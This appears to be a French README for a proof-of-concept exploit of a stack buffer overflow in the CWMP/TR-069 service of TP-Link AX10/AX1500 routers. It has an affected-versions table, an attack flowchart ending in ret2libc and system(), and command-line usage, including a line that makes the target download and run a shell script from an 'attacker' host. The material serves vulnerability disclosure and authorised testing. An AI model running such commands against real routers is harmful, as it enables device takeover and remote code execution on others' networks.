
Débordement de tampon de pile CWMP sur TP-Link AX10/AX1500 — RCE
Débordement de tampon de pile dans CWMP (TR-069) permettant l'exécution de code à distance.
| Champ | Valeur |
|---|---|
| Produit | TP-Link AX10, AX1500 |
| Versions concernées | AX10 < 1.2.1, AX1500 < 1.3.11 |
| CVSS | 8,6 (Élevé) |
| Type | Débordement de tampon de pile |
| Vecteur | CWMP/TR-069 (port 7547) |
| Impact | Exécution de code à distance |
flowchart LR
A[Attacker] --> B["Malicious ACS"]
B --> C["SetParameterValues"]
C --> D["Stack Overflow"]
D --> E["Overwrite PC"]
E --> F["ret2libc"]
F --> G["system()"]
G --> H["RCE"]
La vulnérabilité se trouve dans le traitement par le processus cwmp des requêtes SOAP SetParameterValues. L'entrée est utilisée pour calculer la taille du tampon sans vérification des limites.
Exploitation :
python exploit.py <target_ip> --check-only
python exploit.py 192.168.0.1 --dos
python exploit.py 192.168.0.1 -c "wget http://attacker/shell.sh -O /tmp/s; sh /tmp/s"
Aucun (utilise la bibliothèque standard)
Pour tests de sécurité autorisés uniquement.
| Option | Description | Défaut |
|---|
-p, --port | Port CWMP | 7547 |
-c, --command | Commande pour la RCE | aucun |
-t, --timeout | Délai d'expiration de la socket | 10 |
--dos | Mode DoS uniquement | désactivé |
--check-only | Vérifier si la cible est vulnérable | désactivé |